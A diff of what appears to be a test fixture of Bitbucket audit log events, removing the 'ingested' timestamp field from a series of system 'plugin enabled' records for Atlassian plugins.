@@ -6237,7 +6132,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867785130Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.913Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-jira-development-integration\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-jira-development-integration\"}]}", "type": "info", "kind": "event" 
@@ -6291,7 +6185,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867786110Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.896Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-ref-sync\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-ref-sync\"}]}", "type": "info", "kind": "event" 
@@ -6345,7 +6238,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867787055Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.622Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.remote-link-aggregator-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.remote-link-aggregator-plugin\"}]}", "type": "info", "kind": "event" 
@@ -6399,7 +6291,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867788045Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.613Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-remote-event-common-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-remote-event-common-plugin\"}]}", "type": "info", "kind": "event" 
@@ -6453,7 +6344,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867789094Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.602Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-nav-links-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-nav-links-plugin\"}]}", "type": "info", "kind": "event" 
@@ -6507,7 +6397,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867790323Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.850Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugin.atlassian-spring-scanner-annotation\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugin.atlassian-spring-scanner-annotation\"}]}", "type": "info", "kind": "event" 
@@ -6561,7 +6450,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867791323Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.849Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-jira-commit-checker\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-jira-commit-checker\"}]}", "type": "info", "kind": "event" 
@@ -6615,7 +6503,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867792312Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.770Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-instance-migration\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-instance-migration\"}]}", "type": "info", "kind": "event" 
@@ -6669,7 +6556,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867793244Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.764Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-importer\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-importer\"}]}", "type": "info", "kind": "event" @@ -6723,7 +6609,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867794403Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.134Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-i18n\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-i18n\"}]}", "type": "info", "kind": "event" 
@@ -6777,7 +6662,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867795395Z", "original": "{\"timestamp\":\"2021-11-27T17:29:17.595Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-http-scm-protocol\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-http-scm-protocol\"}]}", "type": "info", "kind": "event" 
@@ -6831,7 +6715,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867796396Z", "original": "{\"timestamp\":\"2021-11-27T17:29:17.589Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-highlight\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-highlight\"}]}", "type": "info", "kind": "event" @@ -6885,7 +6768,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867797404Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.439Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-gpg\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-gpg\"}]}", "type": "info", "kind": "event" 
@@ -6939,7 +6821,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867798351Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.421Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-git-rest\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-git-rest\"}]}", "type": "info", "kind": "event" 
@@ -6993,7 +6874,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867799359Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.393Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-git-lfs\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-git-lfs\"}]}", "type": "info", "kind": "event" 
@@ -7047,7 +6927,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867800266Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.364Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.httpclient.atlassian-httpclient-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.httpclient.atlassian-httpclient-plugin\"}]}", "type": "info", "kind": "event" 
@@ -7101,7 +6980,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867801157Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.363Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-git\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-git\"}]}", "type": "info", "kind": "event" @@ -7155,7 +7033,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867802057Z", "original": "{\"timestamp\":\"2021-11-27T17:29:11.242Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-frontend\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-frontend\"}]}", "type": "info", "kind": "event" 
@@ -7209,7 +7086,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867803003Z", "original": "{\"timestamp\":\"2021-11-27T17:29:11.102Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-jira\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-jira\"}]}", "type": "info", "kind": "event" 
@@ -7263,7 +7139,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867803964Z", "original": "{\"timestamp\":\"2021-11-27T17:29:11.019Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-deployments\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-deployments\"}]}", "type": "info", "kind": "event" 
@@ -7317,7 +7192,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867804859Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.955Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-default-reviewers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-default-reviewers\"}]}", "type": "info", "kind": "event" 
@@ -7371,7 +7245,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867806145Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.661Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-crowd-sso\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-crowd-sso\"}]}", "type": "info", "kind": "event" 
@@ -7425,7 +7298,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867807152Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.658Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-crowd-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-crowd-spi\"}]}", "type": "info", "kind": "event" 
@@ -7479,7 +7351,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867808125Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.656Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-contributing-guidelines\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-contributing-guidelines\"}]}", "type": "info", "kind": "event" 
@@ -7533,7 +7404,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867809092Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.644Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-connect-support\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-connect-support\"}]}", "type": "info", "kind": "event" @@ -7587,7 +7457,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867810059Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.643Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.jwt.jwt-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.jwt.jwt-plugin\"}]}", "type": "info", "kind": "event" 
@@ -7641,7 +7510,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867810946Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.560Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-compare\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-compare\"}]}", "type": "info", "kind": "event" 
